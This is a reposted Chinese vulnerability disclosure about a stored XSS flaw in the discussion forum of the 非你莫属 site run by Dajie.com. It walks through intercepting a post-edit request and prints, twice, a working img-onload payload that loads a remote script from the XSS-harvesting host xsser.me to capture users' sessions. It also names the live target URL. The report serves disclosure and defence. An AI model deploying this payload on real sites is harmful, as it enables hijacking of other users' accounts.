好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

大街网 非你莫属官网某板块储存型XSS 可获取用户

原来非你莫属的官网是大街网给提供的额,在大街网官方的某板块中也找到了几个,不过有限制,要是能突破了再提交。

 

看了下大街网的 漏洞 ,全是XSS,霸气啊!这里我再加一个。。。

详细说明:1 百度非你莫属官网,可以看到是大街网的域名。

 

 

 

 

 

2 进去之后选择讨论区板块。

 

 

 

 

3 随便发个帖子,里面插张图,然后点击编辑,抓包。

 

图3 

 

 

 

4 修改post数据构造xss代码

 

 

 

 

5 可以看到这里的空格会自动解析,所以构造的时候不要加空格。

 

 

 

 

6 搞定之后用F12查看有么有成功(其实这个是在开始测试的时候就要看能不能插入,有么有过滤)

 

 

 

 

 

 

复制到外部txt中的代码(新手请不要直接在那里看,一定要用Copy as HTML复制出来看,因为那里看到的是解析过的,大牛可以用颜色区分)

 

 

<img src=http://up.2cto.com/2013/0220/20130220030323905.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">

 

7 大功告成的效果,看起来一个很正常的帖子,点击就中招了。

 

图8 9 

 

 

 

 

 

 

 

END 

1 测试地址,自己看,看完删掉。http://fnms.dajie.com/fnms/discuss/topic/162281/detail

 

 

2 构造后的恶意代码。

 

 

<img src=http://up.2cto.com/2013/0220/20130220030323905.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">

 

3 附一张霸气的图,大街网目前9个漏洞都是XSS,霸气啊!本人习惯,挖一个网站之前,先在乌云看下厂商之前的漏洞。希望大街网可以对安全重视,100%的XSS漏洞已经很能说明问题了。

 

 

 

修复方案: 过滤 

 

查看更多关于大街网 非你莫属官网某板块储存型XSS 可获取用户的详细内容...

  阅读:50次